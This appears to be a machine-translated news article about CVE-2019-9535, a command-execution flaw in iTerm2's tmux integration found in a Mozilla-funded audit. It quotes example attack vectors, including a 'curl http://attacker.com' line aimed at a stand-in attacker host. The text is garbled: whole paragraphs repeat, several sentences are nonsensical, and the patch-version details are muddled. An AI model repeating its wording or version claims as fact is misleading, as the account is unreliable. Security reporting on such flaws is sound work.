Popular terminal emulator, iTerm2, which is widely used by developers and system administrators, and many people even use it to process some untrusted data, thus, MOSS (Mozilla Open Source Support Program) chose iTerm2 this time, then entrusted ROS (Radically Open Security, funded by MOSS) for security audit work.
It turns out that ROS discovered a critical security vulnerability in the widely used macOS terminal emulator, it is known that this vulnerability has been in iTerm2 for 7 years and is currently assigned the code CVE-2019-9535. This vulnerability could allow an attacker to execute commands on a user's computer.
ROS provides an attack example whereby video content is deliberately intended to convey logical proof so that when a user connects to a malicious SSH server, even though the attacker only demonstrates an unrestricted computer software, it's able to perform various malicious instructions.
Mozilla said that although the software would proactively trigger for updates. they expect developers to actively send out updates and reduce the chances of being targeted.
It turns out that ROS discovered a critical security vulnerability in the widely used macOS terminal emulator, it is known that this vulnerability has been in iTerm2 for 7 years and is currently assigned the code CVE-2019-9535. This vulnerability could allow an attacker to execute commands on a user's computer.
ROS provides an attack example whereby video content is deliberately intended to convey logical proof so that when a user connects to a malicious SSH server, even though the attacker only demonstrates an unrestricted computer software, it's able to perform various malicious instructions.
During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.Mozilla noted that this vulnerability requires a certain degree of interaction with the user before the attacker can execute subsequent attacks, but is considered to have a high potential security risk due to attacks that are generally considered harmless. Now Mozilla, ROS and iTerm2 developers have been working closely together to release the new 3.3.6 update, and the 3.3.5 security patch has also been made available.
Mozilla said that although the software would proactively trigger for updates. they expect developers to actively send out updates and reduce the chances of being targeted.
Post a Comment